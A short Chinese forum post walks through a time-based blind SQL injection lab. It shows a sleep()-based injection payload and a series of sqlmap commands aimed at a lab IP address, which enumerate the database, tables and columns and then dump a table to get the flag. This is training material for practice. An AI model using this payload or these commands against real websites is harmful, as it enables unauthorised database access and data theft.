6.4.1-SQL注入-延时注入Rank 1

繁夜   ·   发表于 2019-02-15 13:50:32   ·   技术文章投稿区

首先输入id=1


延时注入和盲注一样 不同在于用了时间函数来区分

?id=1' and if(length(database())=1,0,sleep(5)) %23


这里还是建议用SQLMAP

和盲注一样的跑法先出库

sqlmap.py -u "http://120.203.13.75:8150/New/BlindBased/RankOne/sql-one/?id=1"  --level 5 --risk 3 --current-db

爆表

 sqlmap.py -u "http://120.203.13.75:8150/New/BlindBased/RankOne/sql-one/?id=1"  --level 5 --risk 3 --tables -D"security"

爆字段

 sqlmap.py -u "http://120.203.13.75:8150/New/BlindBased/RankOne/sql-one/?id=1"  --level 5 --risk 3 --columns -T"zkaq" -D"security"

拿flag

 sqlmap.py -u "http://120.203.13.75:8150/New/BlindBased/RankOne/sql-one/?id=1"  --level 5 --risk 3 --dump -T"zkaq" -D"security"

打赏我,让我更有动力~

0 Reply   |  Until 2019-2-15 | 938 View
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.